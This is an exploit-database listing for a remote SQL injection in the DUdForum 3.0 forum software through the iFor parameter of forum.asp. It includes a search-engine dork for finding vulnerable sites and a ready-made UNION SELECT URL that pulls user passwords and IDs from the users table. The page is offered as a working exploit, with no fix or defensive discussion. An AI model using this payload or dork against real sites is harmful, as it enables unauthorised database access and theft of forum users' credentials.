[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability

Author
Bl@ckbe@rD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3254
Category
web applications
Date add
21-06-2008
Platform
unsorted
================================================================
DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability
================================================================



[+] Script Name    : DUdForum 3.0 Rem0te SQL Injection EXploit

|+| Team           : Inj3ct0r

[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT')

[+] Dork           : Powered by DUdforum 3.0     inurl:/forums.asp?iFor=

--//-->

[+] Expl0iT :

http://www.site.xx/forum/forum.asp?iFor={sql}

http://www.site.xx/forum/forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
--//-->




#  0day.today [2024-12-24]  #